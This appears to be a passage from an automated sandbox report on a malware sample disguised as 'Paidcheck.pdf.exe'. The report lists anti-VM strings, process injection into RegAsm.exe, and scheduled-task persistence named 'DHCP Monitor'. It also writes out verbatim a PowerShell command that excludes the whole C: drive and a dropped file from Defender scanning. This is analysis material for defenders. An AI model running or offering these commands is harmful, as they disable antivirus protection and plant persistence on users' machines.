      Source: Paidcheck.pdf.exe, 00000000.00000002.306008181.0000000002CD5000.00000004.00000001.sdmpBinary or memory string: vmware
      Source: Paidcheck.pdf.exeBinary or memory string: 8xtufgFL9YSJTJhKurqTEQ4KHdRlcviru4FUtiXAAUnnOXunjt4Xvipp3nhZtWVo+r+hOi0xK\7O7OCaMW+CuwwYdEahHwAey+MLxaowRjPiaPwgAMJaIMKBGk69eJN8nHBHp8XVGKcVV4PdaO0mGxG/JEAr8ITBz3fEoXnlAkKObYKN\7XyeVNLZvMCiE8ZjgMRtjomvalJwoGzov7OAgrMeTy3CqTWunb/XDcypmS73RJjnzQJxs58+cgWyiqgecHR
      Source: Paidcheck.pdf.exe, 00000000.00000002.306008181.0000000002CD5000.00000004.00000001.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
      Source: wscript.exe, 00000009.00000002.307685747.0000000000E23000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: powershell.exe, 0000000B.00000003.399307837.000000000563E000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      Injects a PE file into a foreign processes
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5A
      Writes to foreign memory regions
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 402000
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 420000
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 422000
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 829008
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp'
      Source: RegAsm.exe, 0000000A.00000002.482649400.0000000002D4A000.00000004.00000001.sdmpBinary or memory string: Program Manager F
      Source: RegAsm.exe, 0000000A.00000002.485915733.0000000003212000.00000004.00000001.sdmpBinary or memory string: Program Manager
      Source: RegAsm.exe, 0000000A.00000002.479713175.0000000001460000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: RegAsm.exe, 0000000A.00000002.479713175.0000000001460000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: RegAsm.exe, 0000000A.00000002.489937133.0000000006CBB000.00000004.00000001.sdmpBinary or memory string: Program Managerram Manager
      Source: RegAsm.exe, 0000000A.00000002.479713175.0000000001460000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: RegAsm.exe, 0000000A.00000002.488221357.00000000060BD000.00000004.00000001.sdmpBinary or memory string: Program Managerram Manager
      Source: RegAsm.exe, 0000000A.00000002.490208871.0000000006FEC000.00000004.00000001.sdmpBinary or memory string: Program Manager
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Users\user\Desktop\Paidcheck.pdf.exe VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
